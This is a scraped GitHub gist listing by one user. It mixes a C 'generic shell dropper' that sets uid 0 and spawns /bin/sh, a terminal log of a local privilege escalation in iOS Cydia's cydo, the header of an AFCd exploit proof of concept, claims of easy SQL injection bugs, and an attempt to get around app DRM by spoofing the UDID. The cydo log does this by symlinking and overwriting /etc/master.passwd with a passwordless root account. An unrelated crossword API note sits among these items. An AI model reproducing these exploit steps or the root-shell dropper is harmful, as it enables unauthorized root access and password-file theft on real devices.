Generic shell dropper:
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv, char **envp) {
setuid(0);
execl("/bin/sh", "/bin/sh", 0);
return 0;
}
PythEch
PythEch
/ nytimes_crossword
Created
October 27, 2018 11:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Get https://nyt-games-prd.appspot.com/svc/crosswords/v3/games-hub-puzzles.json | |
| 2. Extract results.mini_puzzle.[*].puzzle_id | |
| 3. Then head over to https://nyt-games-prd.appspot.com/svc/crosswords/v6/${puzzle_id}.json | |
| 4. Parse the data. |
PythEch
/ gist:d181bf1411057e480586
Last active
June 22, 2016 18:38
Cydo Arbitrary Write Local Privilege Escalation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd | |
| Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log | |
| Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh" | |
| thou shalt not pass | |
| Hakans-iPhone:/var/tmp mobile$ su cydo | |
| Hakans-iPhone:/var/tmp root# cat /etc/master.passwd | |
| ## | |
| # User Database | |
| # | |
| # This file is the authoritative user database. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| """ | |
| PoC of AFCd Vulnerability After Pangu Jailbreak | |
| Copyright (C) 2014 PythEch | |
| This program is free software: you can redistribute it and/or modify | |
| it under the terms of the GNU General Public License as published by | |
| the Free Software Foundation, either version 3 of the License, or | |
| (at your option) any later version. |
This gist includes multiple SQL injection vulnerabilities I found by accident in a bus while travelling. These vulnerabilities are easy to find and easy to exploit, and critical.
I already have Flex legacy paid but, can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot, downloaded the beta from getdelta.co
For fun, I tried to figure out whether spoofing UDID is possible by patching Flex 2 itself. I already knew you have put so much work into DRM. I'm still unsuccessful at this.